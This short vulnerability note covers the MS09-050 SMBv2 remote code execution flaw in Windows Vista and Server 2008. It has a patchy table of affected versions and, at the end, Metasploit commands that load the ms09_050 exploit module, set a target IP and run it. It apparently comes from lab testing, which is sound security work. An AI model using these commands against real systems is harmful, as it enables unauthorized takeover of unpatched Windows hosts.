Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC do not properly process the command value in an SMB Multi-Protocol Negotiate Request packet, which allows remote attackers to execute arbitrary code via a crafted SMBv2 packet to the Server service, aka "SMBv2 Command Value Vulnerability."
Product | CPU Architecture | Version | Update | Tested |
---|---|---|---|---|
Windows Server 2008 | X64/X86 | SP2 | ✔ | |
Windows Server 2008 | X86/X64 | |||
Windows Vista | SP1 | |||
Windows Vista | SP2 | |||
Windows Vista |
use MSF Test system Windows Server 2008 SP2 x86
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set RHOSTS 192.168.1.13 #目标IP
run